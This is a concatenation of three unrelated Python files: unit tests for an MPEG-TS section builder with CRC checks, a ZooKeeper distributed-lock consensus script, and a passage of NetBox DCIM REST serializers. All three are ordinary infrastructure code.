    """Calculate and append the CRC to a block of section data

    The CRC is computed over everything except the final four bytes, which
    are then overwritten in place with the result.

    Arguments:
    data -- List of bytes. Data to manipulate
    """
    data[-4:] = calculate_crc(data[:-4])
'''UNIT TESTS -------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------
'''
if __name__ == '__main__':
    # Self-test: round-trips every setter against section_parser's getters.
    import unittest
    import section_parser as sparser
    import random
    print("hello world")
    # Sample Conditional Access Table section with a valid trailing CRC.
    SAMPLE_CAT = [
        0x01, 0xB0, 0x0F, 0xFF, 0xFF, 0xC1, 0x00, 0x00, 0x09,
        0x04, 0x06, 0x06, 0x05, 0x00, 0x90, 0x64, 0xC6, 0xD0]
    # Same section with 0xFF placeholders where the CRC belongs.
    SAMPLE_CAT_NO_CRC = [
        0x01, 0xB0, 0x0F, 0xFF, 0xFF, 0xC1, 0x00, 0x00, 0x09,
        0x04, 0x06, 0x06, 0x05, 0x00, 0xFF, 0xFF, 0xFF, 0xFF]

    class Crc(unittest.TestCase):
        # CRC helpers must reproduce the known-good sample CRC.
        def test_append(self):
            append_crc(SAMPLE_CAT_NO_CRC)
            self.assertEqual(SAMPLE_CAT_NO_CRC, SAMPLE_CAT)
        def test_calculate(self):
            self.assertEqual(calculate_crc(SAMPLE_CAT_NO_CRC[0:-4]), SAMPLE_CAT[-4:])

    class All(unittest.TestCase):
        # Applies every setter, then verifies each field via section_parser.
        def test(self):
            self.assertEqual(len(self.data), self.data_length)
            set_table_id(self.data, 1)
            set_section_syntax_indicator(self.data, True)
            set_private_indicator(self.data, False)
            set_section_length(self.data, self.data_length - 3)
            set_table_id_extension(self.data, 20)
            set_version_number(self.data, 10)
            set_current_next_indicator(self.data, True)
            set_section_number(self.data, 25)
            set_last_section_number(self.data, 35)
            self.data_contents = random.sample(range(256), self.data_length-8)
            set_data(self.data, self.data_contents, 8)
            actual_data_contents = sparser.get_data(self.data)
            self.assertEqual(self.data[0], 1)
            self.assertTrue(sparser.get_section_syntax_indicator(self.data))
            self.assertFalse(sparser.get_private_indicator(self.data))
            self.assertEqual(sparser.get_section_length(self.data), self.data_length-3)
            self.assertEqual(sparser.get_table_id_extension(self.data), 20)
            self.assertEqual(sparser.get_version_number(self.data), 10)
            self.assertTrue(sparser.get_current_next_indicator(self.data))
            self.assertEqual(sparser.get_section_number(self.data), 25)
            self.assertEqual(sparser.get_last_section_number(self.data), 35)
            self.assertEqual(actual_data_contents, self.data_contents)
        def setUp(self):
            self.data_length = 100
            self.data=create_section_data_block(self.data_length)
        def tearDown(self):
            del(self.data)

    class AllReverse(unittest.TestCase):
        # Same as All, but applies the setters in reverse order to prove
        # that no setter clobbers a previously written field.
        def test(self):
            self.data_contents = random.sample(range(256), self.data_length-8)
            set_data(self.data, self.data_contents, 8)
            set_last_section_number(self.data, 35)
            set_section_number(self.data, 25)
            set_current_next_indicator(self.data, True)
            set_version_number(self.data, 10)
            set_table_id_extension(self.data, 20)
            set_section_length(self.data, self.data_length - 3)
            set_private_indicator(self.data, False)
            set_section_syntax_indicator(self.data, True)
            set_table_id(self.data, 1)
            self.assertEqual(len(self.data), self.data_length)
            self.assertEqual(self.data[0], 1)
            self.assertTrue(sparser.get_section_syntax_indicator(self.data))
            self.assertFalse(sparser.get_private_indicator(self.data))
            self.assertEqual(sparser.get_section_length(self.data), self.data_length-3)
            self.assertEqual(sparser.get_table_id_extension(self.data), 20)
            self.assertEqual(sparser.get_version_number(self.data), 10)
            self.assertTrue(sparser.get_current_next_indicator(self.data))
            self.assertEqual(sparser.get_section_number(self.data), 25)
            self.assertEqual(sparser.get_last_section_number(self.data), 35)
            actual_data_contents = sparser.get_data(self.data)
            self.assertEqual(actual_data_contents, self.data_contents)
        def setUp(self):
            self.data_length = 100
            self.data=create_section_data_block(self.data_length)
        def tearDown(self):
            del(self.data)

    class Seq(unittest.TestCase):
        # Verifies each setter immediately after it runs.
        def test(self):
            self.assertEqual(len(self.data), self.data_length)
            set_table_id(self.data, 1)
            self.assertEqual(self.data[0], 1, 'error setting table id')
            set_section_syntax_indicator(self.data, True)
            self.assertTrue(sparser.get_section_syntax_indicator(self.data), 'Error setting section syntax indicator')
            set_section_syntax_indicator(self.data, False)
            self.assertFalse(sparser.get_section_syntax_indicator(self.data), 'Error setting section syntax indicator')
            set_section_syntax_indicator(self.data, True)
            self.assertTrue(sparser.get_section_syntax_indicator(self.data), 'Error setting section syntax indicator')
            set_private_indicator(self.data, False)
            self.assertFalse(sparser.get_private_indicator(self.data), 'Error setting private indicator')
            set_section_length(self.data, self.data_length - 3)
            self.assertEqual(sparser.get_section_length(self.data), self.data_length-3, 'error setting section length')
            set_table_id_extension(self.data, 20)
            self.assertEqual(sparser.get_table_id_extension(self.data), 20, 'error setting table id extension')
            set_version_number(self.data, 10)
            self.assertEqual(sparser.get_version_number(self.data), 10, 'error setting version number')
            set_current_next_indicator(self.data, True)
            self.assertTrue(sparser.get_current_next_indicator(self.data), 'Error setting current next indicator')
            set_section_number(self.data, 25)
            self.assertEqual(sparser.get_section_number(self.data), 25, 'error setting section number')
            set_last_section_number(self.data, 35)
            self.assertEqual(sparser.get_last_section_number(self.data), 35, 'error setting last section number')
            self.data_contents = random.sample(range(256), self.data_length-8)
            actual_data_contents = sparser.get_data(self.data)
            set_data(self.data, self.data_contents, 8)
            actual_data_contents = sparser.get_data(self.data)
            self.assertEqual(actual_data_contents, self.data_contents, 'error setting section data')
        def setUp(self):
            self.data_length = 100
            self.data=create_section_data_block(self.data_length)
        def tearDown(self):
            del(self.data)

    unittest.main()
| |
# -*- coding: utf-8 -*-
# Copyright (C) Mesosphere, Inc. See LICENSE file for details.
import argparse
import logging
import os
import platform
import sys
import time
import uuid
import kazoo.exceptions
import kazoo.handlers.threading
from kazoo.client import KazooClient
from kazoo.client import KazooState
from retrying import retry
# Upper bound for a proposal payload; presumably aligned with ZooKeeper's
# default ~1 MB znode size limit — confirm.
PAYLOAD_SIZE_LIMIT_BYTES = 1024**2
# Seconds between polls while waiting for the node to appear (read mode).
READ_POLL_INTERVAL_SECONDS = 5
DESCRIPTION = """\
Find consensus about a value through ZooKeeper (ZK).
Read proposal byte sequence from stdin.
Write consensus byte sequence to stdout.
"""
# Root-logger configuration shared by the whole script.
logfmt = "%(asctime)s.%(msecs)03d %(name)s %(levelname)s: %(message)s"
datefmt = "%y%m%d-%H:%M:%S"
logging.basicConfig(format=logfmt, datefmt=datefmt, level=logging.INFO)
log = logging.getLogger()
class ConnectionLost(Exception):
    """Raised elsewhere in this module when the ZK connection drops; treated
    as retryable by retry_consensus_after_error()."""
    pass
def main():
    """Entry point: read or establish the consensus value at the ZK node.

    In read-only mode the node's payload is fetched; otherwise a proposal is
    read from stdin and the consensus procedure is run. The resulting bytes
    are written to stdout.
    """
    opts = parse_args()
    # Validate the node path early, before any network I/O.
    if not opts.zkpath.startswith('/'):
        sys.exit('ZK path must start with a slash.')
    if opts.zkpath.endswith('/'):
        sys.exit('ZK path must not end with a slash.')

    if opts.readonly:
        log.info('Run in read-only mode.')
        r = ZKNodeReader(
            hoststring=opts.host,
            nodepath=opts.zkpath
            )
        output = r.read()
    else:
        log.info('Read payload from stdin.')
        # Read binary data directly from standard stream.
        payload = sys.stdin.buffer.read()
        log.info('Size of payload data: %s bytes.', len(payload))
        if len(payload) > PAYLOAD_SIZE_LIMIT_BYTES:
            msg = 'Error: payload larger than %s bytes' % (
                PAYLOAD_SIZE_LIMIT_BYTES, )
            sys.exit(msg)
        log.info("Run consensus procedure")
        c = ZKValueConsensus(
            hoststring=opts.host,
            payload=payload,
            nodepath=opts.zkpath
            )
        output = c.achieve_consensus()

    log.info('Write %s bytes to stdout.', len(output))
    # Write binary data directly to standard stream.
    sys.stdout.buffer.write(output)
def retry_read_after_error(exc):
    """Return True if this should be retried."""
    log.info("Observed exception: `%r`", exc)
    should_retry = False
    if isinstance(exc, kazoo.exceptions.KazooException):
        log.info("Retry as of KazooException.")
        should_retry = True
    elif isinstance(exc, kazoo.handlers.threading.KazooTimeoutError):
        # https://github.com/python-zk/kazoo/issues/383
        log.info("Retry as of kazoo.handlers.threading.KazooTimeoutError.")
        should_retry = True
    if not should_retry:
        log.info("Do not retry.")
    return should_retry
class ZKNodeReader:
    """Wait until a ZK node exists and return its payload bytes."""

    def __init__(self, hoststring, nodepath):
        self._nodepath = nodepath
        self._hosts = hoststring

    def _readloop(self):
        # Poll until the node appears, then hand back (data, stat).
        while True:
            try:
                return self._zk.get(self._nodepath)
            except kazoo.exceptions.NoNodeError:
                # TODO(jp): install watch for being fast, and increase poll
                # interval.
                log.info(
                    "Node `%s` does not yet exist. Retry in %s s.",
                    self._nodepath, READ_POLL_INTERVAL_SECONDS)
                time.sleep(READ_POLL_INTERVAL_SECONDS)

    # Wait 2^x * 1000 milliseconds between each retry, up to 64 seconds,
    # then 64 seconds afterwards.
    @retry(
        wait_exponential_multiplier=1000,
        wait_exponential_max=64000,
        retry_on_exception=retry_read_after_error
        )
    def read(self):
        """Connect to ZK, read the node payload, and always shut the client
        down afterwards (stop + close even on failure)."""
        log.info('Set up ZK client using host(s): %s', self._hosts)
        client = KazooClient(hosts=self._hosts)
        client.start()
        self._zk = client
        try:
            # This may raise various kazoo.exceptions.* types.
            data, stat = self._readloop()
        finally:
            log.info('Shut down ZK client.')
            try:
                client.stop()
            finally:
                client.close()
        log.info('Foreign payload stat: %s', stat)
        return data
def retry_consensus_after_error(exc):
    """Return True if this should be retried.

    Used as `retry_on_exception` predicate for `achieve_consensus`: transient
    conditions (any KazooException, a degraded connection, or the Kazoo
    startup timeout) are retried; everything else propagates.

    :param exc: the exception observed by the retrying decorator
    :return: True to retry the wrapped call, False to re-raise
    """
    log.info("Observed exception: `%r`", exc)
    if isinstance(exc, kazoo.exceptions.KazooException):
        log.info("Retry as of KazooException.")
        return True
    if isinstance(exc, ConnectionLost):
        log.info("Retry as of ConnectionLost.")
        return True
    if isinstance(exc, kazoo.handlers.threading.KazooTimeoutError):
        # https://github.com/python-zk/kazoo/issues/383
        log.info("Retry as of kazoo.handlers.threading.KazooTimeoutError.")
        return True
    # Consistency fix: `retry_read_after_error` logs the non-retry decision;
    # do the same here so a propagated exception is traceable in the log.
    log.info("Do not retry.")
    return False
class ZKValueConsensus:
    """A helper class for achieving consensus across multiple parties, using
    the ZK distributed lock recipe as coordination mechanism.
    Every contributing party uses the same `nodepath`, proposes its own value
    (`payload`), and eventually all parties proceed using the same value,
    which is one of the proposed ones.
    """
    def __init__(self, hoststring, payload, nodepath):
        # :param hoststring: ZK host string passed to KazooClient.
        # :param payload: proposed value (bytes) for the consensus node.
        # :param nodepath: absolute ZK path all parties agree on.
        self._nodepath = nodepath
        self._payload = payload
        self._hosts = hoststring
        # Use current hostname as ZK lock contender identifier, plus some
        # random bytes.
        self._identifier = platform.node() + '-' + str(uuid.uuid4())[:8]

    # Wait 2^x * 1000 milliseconds between each retry, up to 64 seconds,
    # then 64 seconds afterwards.
    @retry(
        wait_exponential_multiplier=1000,
        wait_exponential_max=64000,
        retry_on_exception=retry_consensus_after_error
        )
    def achieve_consensus(self):
        """Trigger consensus logic and handle errors."""
        log.info('Set up ZK client using host(s): %s', self._hosts)
        zk = KazooClient(hosts=self._hosts)
        # Initialize ZK connection state variable, which is shared across
        # threads. It is updated from a change listener function which is
        # invoked from within a Kazoo connection management thread, see
        # http://kazoo.readthedocs.org/en/latest/api/handlers/threading.html.
        self._connected = False
        zk.add_listener(self._zk_state_change_listener)
        zk.start()
        # Wait for handling thread to update connection status. (As of non-
        # determinism around GIL context switches there is otherwise no
        # guarantee that the status is updated within
        # `_run_consensus_procedure`).
        while not self._connected:
            time.sleep(0.01)
        self._zk = zk
        try:
            # This may raise ConnectionLost or various
            # kazoo.exceptions.* types.
            return self._run_consensus_procedure()
        finally:
            # Always tear the client down, even when the consensus attempt
            # failed; stop() and close() each get their own chance to run.
            log.info('Shut down ZK client.')
            try:
                zk.stop()
            finally:
                zk.close()

    def _run_consensus_procedure(self):
        """
        Normal operation:
        - Acquire distributed lock.
        - Attempt to create node.
        - If creation fails because node is already existing, then read
        data and return it. If creation succeeds, return corresponding
        value.
        - Before returning, release the lock.
        Handling of unexpected events:
        - If the distributed lock acquisition times out, repeat,
        endlessly, in a loop.
        - If the ZK connection state degrades, raise `ConnectionLost`,
        to be handled on a higher level.
        - No other magic is performed, so any kazoo exception thrown
        needs to handled on a higher level.
        """
        # The lock node lives next to the consensus node, e.g.
        # /foo/bar -> lock path /foo/lock.
        head, tail = os.path.split(self._nodepath)
        lockpath = os.path.join(head, 'lock')
        lock = self._zk.Lock(path=lockpath, identifier=self._identifier)
        while True:
            # `_connected` is updated from the Kazoo listener thread.
            if not self._connected:
                raise ConnectionLost
            timed_out = False
            try:
                log.info("Attempt to acquire distributed lock.")
                lock.acquire(timeout=7)
                log.info("Distributed lock acquired.")
                return self._set_or_read()
            except kazoo.exceptions.LockTimeout:
                log.info("Distributed lock acquisition timed out. Retry.")
                timed_out = True
            finally:
                if not timed_out:
                    # Release lock, clean up.
                    log.info("Release distributed lock.")
                    lock.release()
                else:
                    # No cleanup required as lock acquisition timed out.
                    pass

    def _set_or_read(self):
        # Execute under distributed lock protection.
        log.info('Attempt to create node `%s`.', self._nodepath)
        try:
            self._zk.create(
                path=self._nodepath, value=self._payload, makepath=True)
            log.info('Node creation succeeded, return "my" payload.')
            return self._payload
        except kazoo.exceptions.NodeExistsError:
            # Another party won the race earlier; adopt its value.
            log.info('Node exists. Read it.')
            data, stat = self._zk.get(self._nodepath)
            log.info('Foreign payload stat: %s', stat)
            return data

    def _zk_state_change_listener(self, state):
        """
        'When using the kazoo.recipe.lock.Lock or creating ephemeral nodes,
        its highly recommended to add a state listener so that your program
        can properly deal with connection interruptions or a Zookeeper session
        loss.'
        This is executed in the
        kazoo.handlers.threading.SequentialThreadingHandler
        """
        if state == KazooState.LOST:
            log.info('Connection state is KazooState.LOST')
            self._connected = False
        elif state == KazooState.SUSPENDED:
            log.info('Connection state is KazooState.SUSPENDED')
            self._connected = False
        else:
            # CONNECTED state.
            log.info('Connection state is KazooState.CONNECTED')
            self._connected = True
def parse_args(argv=None):
    """Parse command line options.

    :param argv: optional list of argument strings; defaults to
        ``sys.argv[1:]`` (backward-compatible addition so the parser can be
        exercised without touching the process argv).
    :return: ``argparse.Namespace`` with attributes ``zkpath`` (positional),
        ``host`` (default ``127.0.0.1:2181``) and ``readonly`` (bool, set by
        ``--read``, default False).
    """
    parser = argparse.ArgumentParser(
        description=DESCRIPTION)
    parser.add_argument(
        'zkpath',
        type=str,
        help='The ZK node path to sync on.'
        )
    parser.add_argument(
        '--host',
        type=str,
        default='127.0.0.1:2181',
        help=('Host string passed to Kazoo client constructor. '
              'Default: 127.0.0.1:2181'))
    parser.add_argument(
        '--read',
        dest='readonly',
        action='store_true',
        default=False,
        help=('Only read (do not contribute to consensus). Wait until node '
              'exists, and return data to stdout.'))
    return parser.parse_args(argv)
| |
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from drf_yasg.utils import swagger_serializer_method
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
from timezone_field.rest_framework import TimeZoneSerializerField
from dcim.choices import *
from dcim.constants import *
from dcim.models import (
Cable, CablePath, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate, Device, DeviceBay,
DeviceBayTemplate, DeviceType, DeviceRole, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate,
Manufacturer, InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort,
PowerPortTemplate, Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site,
VirtualChassis,
)
from extras.api.customfields import CustomFieldModelSerializer
from extras.api.serializers import TaggedObjectSerializer
from ipam.api.nested_serializers import NestedIPAddressSerializer, NestedVLANSerializer
from ipam.models import VLAN
from netbox.api import (
ChoiceField, ContentTypeField, SerializedPKRelatedField, ValidatedModelSerializer,
WritableNestedSerializer,
)
from tenancy.api.nested_serializers import NestedTenantSerializer
from users.api.nested_serializers import NestedUserSerializer
from utilities.api import get_serializer_for_model
from virtualization.api.nested_serializers import NestedClusterSerializer
from .nested_serializers import *
class CableTerminationSerializer(serializers.ModelSerializer):
    """Mixin exposing the far-end termination of an attached cable
    (`obj._cable_peer`) as `cable_peer` plus its dotted type string."""
    cable_peer_type = serializers.SerializerMethodField(read_only=True)
    cable_peer = serializers.SerializerMethodField(read_only=True)

    def get_cable_peer_type(self, obj):
        # "app_label.model_name" of the peer, or None when no peer is cached.
        peer = obj._cable_peer
        if peer is None:
            return None
        return f'{peer._meta.app_label}.{peer._meta.model_name}'

    @swagger_serializer_method(serializer_or_field=serializers.DictField)
    def get_cable_peer(self, obj):
        """
        Return the appropriate serializer for the cable termination model.
        """
        peer = obj._cable_peer
        if peer is None:
            return None
        nested_cls = get_serializer_for_model(peer, prefix='Nested')
        return nested_cls(peer, context={'request': self.context['request']}).data
class ConnectedEndpointSerializer(ValidatedModelSerializer):
    """Mixin exposing the destination of the object's cable path
    (`obj._path.destination`) as `connected_endpoint`, along with its dotted
    type string and reachability flag."""
    connected_endpoint_type = serializers.SerializerMethodField(read_only=True)
    connected_endpoint = serializers.SerializerMethodField(read_only=True)
    connected_endpoint_reachable = serializers.SerializerMethodField(read_only=True)

    def get_connected_endpoint_type(self, obj):
        # "app_label.model_name" of the destination, or None if there is no
        # path or the path has no destination.
        if obj._path is not None and obj._path.destination is not None:
            return f'{obj._path.destination._meta.app_label}.{obj._path.destination._meta.model_name}'
        return None

    @swagger_serializer_method(serializer_or_field=serializers.DictField)
    def get_connected_endpoint(self, obj):
        """
        Return the appropriate serializer for the type of connected object.
        """
        if obj._path is not None and obj._path.destination is not None:
            serializer = get_serializer_for_model(obj._path.destination, prefix='Nested')
            context = {'request': self.context['request']}
            return serializer(obj._path.destination, context=context).data
        return None

    @swagger_serializer_method(serializer_or_field=serializers.BooleanField)
    def get_connected_endpoint_reachable(self, obj):
        # Reachability mirrors the path's is_active flag; None when no path.
        if obj._path is not None:
            return obj._path.is_active
        return None
#
# Regions/sites
#
class RegionSerializer(serializers.ModelSerializer):
    """Serializer for Regions; `_depth` is sourced from the model's `level`
    attribute and `site_count` is a read-only annotation."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:region-detail')
    parent = NestedRegionSerializer(required=False, allow_null=True)
    site_count = serializers.IntegerField(read_only=True)
    _depth = serializers.IntegerField(source='level', read_only=True)

    class Meta:
        model = Region
        fields = ['id', 'url', 'name', 'slug', 'parent', 'description', 'site_count', '_depth']
class SiteSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Full representation of a Site, including nested region/tenant and
    read-only counts of related objects."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:site-detail')
    status = ChoiceField(choices=SiteStatusChoices, required=False)
    region = NestedRegionSerializer(required=False, allow_null=True)
    tenant = NestedTenantSerializer(required=False, allow_null=True)
    time_zone = TimeZoneSerializerField(required=False)
    # Read-only annotations computed by the view's queryset.
    circuit_count = serializers.IntegerField(read_only=True)
    device_count = serializers.IntegerField(read_only=True)
    prefix_count = serializers.IntegerField(read_only=True)
    rack_count = serializers.IntegerField(read_only=True)
    virtualmachine_count = serializers.IntegerField(read_only=True)
    vlan_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = Site
        fields = [
            'id', 'url', 'name', 'slug', 'status', 'region', 'tenant', 'facility', 'asn', 'time_zone', 'description',
            'physical_address', 'shipping_address', 'latitude', 'longitude', 'contact_name', 'contact_phone',
            'contact_email', 'comments', 'tags', 'custom_fields', 'created', 'last_updated', 'circuit_count',
            'device_count', 'prefix_count', 'rack_count', 'virtualmachine_count', 'vlan_count',
        ]
#
# Racks
#
class RackGroupSerializer(ValidatedModelSerializer):
    """Serializer for RackGroups; `_depth` is sourced from the model's
    `level` attribute."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rackgroup-detail')
    site = NestedSiteSerializer()
    parent = NestedRackGroupSerializer(required=False, allow_null=True)
    rack_count = serializers.IntegerField(read_only=True)
    _depth = serializers.IntegerField(source='level', read_only=True)

    class Meta:
        model = RackGroup
        fields = ['id', 'url', 'name', 'slug', 'site', 'parent', 'description', 'rack_count', '_depth']
class RackRoleSerializer(ValidatedModelSerializer):
    """Serializer for RackRoles with a read-only rack count."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rackrole-detail')
    rack_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = RackRole
        fields = ['id', 'url', 'name', 'slug', 'color', 'description', 'rack_count']
class RackSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Full representation of a Rack. Uniqueness of (group, facility_id) is
    enforced conditionally in validate() rather than via Meta validators."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rack-detail')
    site = NestedSiteSerializer()
    group = NestedRackGroupSerializer(required=False, allow_null=True, default=None)
    tenant = NestedTenantSerializer(required=False, allow_null=True)
    status = ChoiceField(choices=RackStatusChoices, required=False)
    role = NestedRackRoleSerializer(required=False, allow_null=True)
    type = ChoiceField(choices=RackTypeChoices, allow_blank=True, required=False)
    width = ChoiceField(choices=RackWidthChoices, required=False)
    outer_unit = ChoiceField(choices=RackDimensionUnitChoices, allow_blank=True, required=False)
    device_count = serializers.IntegerField(read_only=True)
    powerfeed_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = Rack
        fields = [
            'id', 'url', 'name', 'facility_id', 'display_name', 'site', 'group', 'tenant', 'status', 'role', 'serial',
            'asset_tag', 'type', 'width', 'u_height', 'desc_units', 'outer_width', 'outer_depth', 'outer_unit',
            'comments', 'tags', 'custom_fields', 'created', 'last_updated', 'device_count', 'powerfeed_count',
        ]
        # Omit the UniqueTogetherValidator that would be automatically added to validate (group, facility_id). This
        # prevents facility_id from being interpreted as a required field.
        validators = [
            UniqueTogetherValidator(queryset=Rack.objects.all(), fields=('group', 'name'))
        ]

    def validate(self, data):
        """Apply the (group, facility_id) uniqueness check only when a
        facility_id was actually supplied, then run model validation."""
        # Validate uniqueness of (group, facility_id) since we omitted the automatically-created validator from Meta.
        if data.get('facility_id', None):
            validator = UniqueTogetherValidator(queryset=Rack.objects.all(), fields=('group', 'facility_id'))
            validator(data, self)

        # Enforce model validation
        super().validate(data)

        return data
class RackUnitSerializer(serializers.Serializer):
    """
    A rack unit is an abstraction formed by the set (rack, position, face); it does not exist as a row in the database.
    """
    # All fields are read-only: rack units are computed, never written.
    id = serializers.IntegerField(read_only=True)
    name = serializers.CharField(read_only=True)
    face = ChoiceField(choices=DeviceFaceChoices, read_only=True)
    device = NestedDeviceSerializer(read_only=True)
    occupied = serializers.BooleanField(read_only=True)
class RackReservationSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Serializer for RackReservations (a set of units within a rack held by
    a user, optionally on behalf of a tenant)."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rackreservation-detail')
    rack = NestedRackSerializer()
    user = NestedUserSerializer()
    tenant = NestedTenantSerializer(required=False, allow_null=True)

    class Meta:
        model = RackReservation
        fields = ['id', 'url', 'rack', 'units', 'created', 'user', 'tenant', 'description', 'tags', 'custom_fields']
class RackElevationDetailFilterSerializer(serializers.Serializer):
    """Validates the rendering/filter query parameters accepted by the rack
    elevation detail endpoint; defaults mirror project settings."""
    q = serializers.CharField(
        required=False,
        default=None
    )
    face = serializers.ChoiceField(
        choices=DeviceFaceChoices,
        default=DeviceFaceChoices.FACE_FRONT
    )
    render = serializers.ChoiceField(
        choices=RackElevationDetailRenderChoices,
        default=RackElevationDetailRenderChoices.RENDER_JSON
    )
    unit_width = serializers.IntegerField(
        default=settings.RACK_ELEVATION_DEFAULT_UNIT_WIDTH
    )
    unit_height = serializers.IntegerField(
        default=settings.RACK_ELEVATION_DEFAULT_UNIT_HEIGHT
    )
    legend_width = serializers.IntegerField(
        default=RACK_ELEVATION_LEGEND_WIDTH_DEFAULT
    )
    exclude = serializers.IntegerField(
        required=False,
        default=None
    )
    expand_devices = serializers.BooleanField(
        required=False,
        default=True
    )
    include_images = serializers.BooleanField(
        required=False,
        default=True
    )
#
# Device types
#
class ManufacturerSerializer(ValidatedModelSerializer):
    """Serializer for Manufacturers with read-only related-object counts."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:manufacturer-detail')
    devicetype_count = serializers.IntegerField(read_only=True)
    inventoryitem_count = serializers.IntegerField(read_only=True)
    platform_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = Manufacturer
        fields = [
            'id', 'url', 'name', 'slug', 'description', 'devicetype_count', 'inventoryitem_count', 'platform_count',
        ]
class DeviceTypeSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Full representation of a DeviceType (hardware model definition)."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicetype-detail')
    manufacturer = NestedManufacturerSerializer()
    subdevice_role = ChoiceField(choices=SubdeviceRoleChoices, allow_blank=True, required=False)
    device_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = DeviceType
        fields = [
            'id', 'url', 'manufacturer', 'model', 'slug', 'display_name', 'part_number', 'u_height', 'is_full_depth',
            'subdevice_role', 'front_image', 'rear_image', 'comments', 'tags', 'custom_fields', 'created',
            'last_updated', 'device_count',
        ]
class ConsolePortTemplateSerializer(ValidatedModelSerializer):
    """Serializer for console port templates defined on a device type."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleporttemplate-detail')
    device_type = NestedDeviceTypeSerializer()
    type = ChoiceField(
        choices=ConsolePortTypeChoices,
        allow_blank=True,
        required=False
    )

    class Meta:
        model = ConsolePortTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'description']
class ConsoleServerPortTemplateSerializer(ValidatedModelSerializer):
    """Serializer for console server port templates defined on a device type."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleserverporttemplate-detail')
    device_type = NestedDeviceTypeSerializer()
    type = ChoiceField(
        choices=ConsolePortTypeChoices,
        allow_blank=True,
        required=False
    )

    class Meta:
        model = ConsoleServerPortTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'description']
class PowerPortTemplateSerializer(ValidatedModelSerializer):
    """Serializer for power port templates defined on a device type."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerporttemplate-detail')
    device_type = NestedDeviceTypeSerializer()
    type = ChoiceField(
        choices=PowerPortTypeChoices,
        allow_blank=True,
        required=False
    )

    class Meta:
        model = PowerPortTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description']
class PowerOutletTemplateSerializer(ValidatedModelSerializer):
    """Serializer for power outlet templates defined on a device type,
    optionally linked to a power port template and feed leg."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:poweroutlettemplate-detail')
    device_type = NestedDeviceTypeSerializer()
    type = ChoiceField(
        choices=PowerOutletTypeChoices,
        allow_blank=True,
        required=False
    )
    power_port = NestedPowerPortTemplateSerializer(
        required=False
    )
    feed_leg = ChoiceField(
        choices=PowerOutletFeedLegChoices,
        allow_blank=True,
        required=False
    )

    class Meta:
        model = PowerOutletTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description']
class InterfaceTemplateSerializer(ValidatedModelSerializer):
    """Serializer for interface templates defined on a device type."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:interfacetemplate-detail')
    device_type = NestedDeviceTypeSerializer()
    type = ChoiceField(choices=InterfaceTypeChoices)

    class Meta:
        model = InterfaceTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'mgmt_only', 'description']
class RearPortTemplateSerializer(ValidatedModelSerializer):
    """Serializer for rear port templates defined on a device type."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rearporttemplate-detail')
    device_type = NestedDeviceTypeSerializer()
    type = ChoiceField(choices=PortTypeChoices)

    class Meta:
        model = RearPortTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'positions', 'description']
class FrontPortTemplateSerializer(ValidatedModelSerializer):
    """Serializer for front port templates, each mapped to a rear port
    template position."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:frontporttemplate-detail')
    device_type = NestedDeviceTypeSerializer()
    type = ChoiceField(choices=PortTypeChoices)
    rear_port = NestedRearPortTemplateSerializer()

    class Meta:
        model = FrontPortTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description']
class DeviceBayTemplateSerializer(ValidatedModelSerializer):
    """Serializer for device bay templates defined on a device type."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicebaytemplate-detail')
    device_type = NestedDeviceTypeSerializer()

    class Meta:
        model = DeviceBayTemplate
        fields = ['id', 'url', 'device_type', 'name', 'label', 'description']
#
# Devices
#
class DeviceRoleSerializer(ValidatedModelSerializer):
    """Serializer for DeviceRoles with read-only device/VM counts."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicerole-detail')
    device_count = serializers.IntegerField(read_only=True)
    virtualmachine_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = DeviceRole
        fields = [
            'id', 'url', 'name', 'slug', 'color', 'vm_role', 'description', 'device_count', 'virtualmachine_count',
        ]
class PlatformSerializer(ValidatedModelSerializer):
    """Serializer for Platforms (OS/driver definitions) with read-only
    device/VM counts."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:platform-detail')
    manufacturer = NestedManufacturerSerializer(required=False, allow_null=True)
    device_count = serializers.IntegerField(read_only=True)
    virtualmachine_count = serializers.IntegerField(read_only=True)

